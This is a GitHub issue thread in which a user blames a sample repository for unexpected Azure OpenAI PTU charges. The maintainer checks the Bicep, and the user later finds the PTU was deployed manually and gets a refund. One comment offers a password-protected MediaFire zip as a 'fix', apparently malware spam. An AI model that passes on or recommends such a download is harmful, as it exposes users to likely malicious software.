### ISSUE TITLE
Billing Escalation Request Due to Undocumented Feature in Azure-Samples Repository

### ISSUE THREAD

**Issue by YuxuanZhang49** [Azure-Samples/ai-rag-chat-evaluator#100]
> Please provide us with the following information:
> ---------------------------------------------------------------

**Context**
We are utilizing this repository to evaluate model results based on the trustworthiness and quality of Azure-Samples.

**Situation**
However, we observed an unusually high cost over the weekend starting on 23/08. Upon investigation, the team discovered that the cost was due to the reservation of Azure OpenAI capacity for the GPT-4 model. This reservation was triggered by an undocumented section of code in the aforementioned repository, specifically at this line.

Given that the cost is entirely driven by this undocumented feature in a public repository within Azure Samples, we believe this expense could have been avoided if the repository had clearly outlined the cost implications. Therefore, we are looking to raise a billing escalation.

Please find the root-cause analysis attached.
 
Really appreciate your help!

<img width="744" alt="Screenshot 2024-08-26 at 6 28 58 PM" src="https://github.com/user-attachments/assets/fd97ebc5-cff8-43a4-b1ca-e3a29037c0aa">
<img width="766" alt="Screenshot 2024-08-26 at 6 29 10 PM" src="https://github.com/user-attachments/assets/7231f0c9-1b1f-4bb2-8597-3fe4b5d5caef">

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pamelafox** [comment]
That cost calculator is for PTU, but this sample doesn't use PTU. I think that old cost calculator links now show PTU, because they added it back and defaulted to it, so it may need that I need to update the calculator link for this one, I will take a look.
Did you have an experience where this sample somehow deployed PTU versus Pay-as-you-go?

**Comment by pamelafox** [comment]
I've also added a cost estimation to the main page that shows the number of tokens used:
https://github.com/Azure-Samples/ai-rag-chat-evaluator/?tab=readme-ov-file#cost-estimation

**Comment by YuxuanZhang49** [comment]
Thank you Pamela, this repo indeed deployed the 30 PTU (provisioned managed) and encountered insane cost within 2 days, would it please help us chat with Azure side for the cost refund? Thank you 


<img width="1103" alt="Screenshot 2024-08-27 at 9 15 38 AM" src="https://github.com/user-attachments/assets/987d63f1-e9f7-47a6-a7aa-bbe737f06e4c">
<img width="796" alt="Screenshot 2024-08-27 at 9 16 24 AM" src="https://github.com/user-attachments/assets/0de3e237-b291-40b4-a140-eea868959621">

**Comment by pamelafox** [comment]
I assume this is with no change to the Bicep in this repository, correct?
Could you look at the resource group and find the deployments corresponding to the gpt-4 deployment, then check the inputs? It should show the sku specified to the openai Bicep module, which should be S0.
I've confirmed that the gpt-4 deployed in my RG is a Standard sku, as expected by the Bicep specifying S0.

**Comment by YuxuanZhang49** [comment]
Hi Pamela, Thank you for checking

We didnt change the Bicep file, we are sharing the resource group(especially openai service) with the [azure-search-openai-demo](https://github.com/Azure-Samples/azure-search-openai-demo), maybe that interferenced the deployment.

**Comment by pamelafox** [comment]
Were you able to look at the Deployments in the Azure Portal for the resource group to see what the Inputs/Template looked like for the openai module?

I am attempting to replicate. Given you're using an existing resource group, did you initially set this up by setting parameters like this?

```
azd env set AZURE_OPENAI_RESOURCE_GROUP rg-up4demo
azd env set AZURE_OPENAI_SERVICE cog-5hhse4yls5chk
azd env set AZURE_LOCATION swedencentral
```

Or did you use a different approach to use the existing resource group? I didn't fully document how to make a new deployment in an existing RG, so I think you must have deduced it yourself.

**Comment by YuxuanZhang49** [comment]
Hi Pamela, We have raised a ticket with Azure support and waiting on them for further advice on how best to engage and debug this. Hopefully we can get on a call to walk through our setup and diagnose.

**Comment by pamelafox** [comment]
Okay, I just did a deployment inside an existing RG, and also got a Standard Sku GPT-4. You can let Azure support know that the Bicep in this repo should not be deploying PTU. Keep me posted if you discover what led to the selection of the PTU sku.

**Comment by YuxuanZhang49** [comment]
Hi Pamela,

Our team discovered that we manually deployed the PTU.

After discussing the issue with an Azure support engineer, we learned that accidental PTU deployments are a somewhat recurring problem. In the East US region, where our resources are hosted, GPT-4 is only available for deployment in PTU.

Azure has approved a reversal of the billing amount for the incorrect deployment.

We really appreciate you checking the Bicep code!

I will close this ticket for now.

Best regards,
Yuxuan
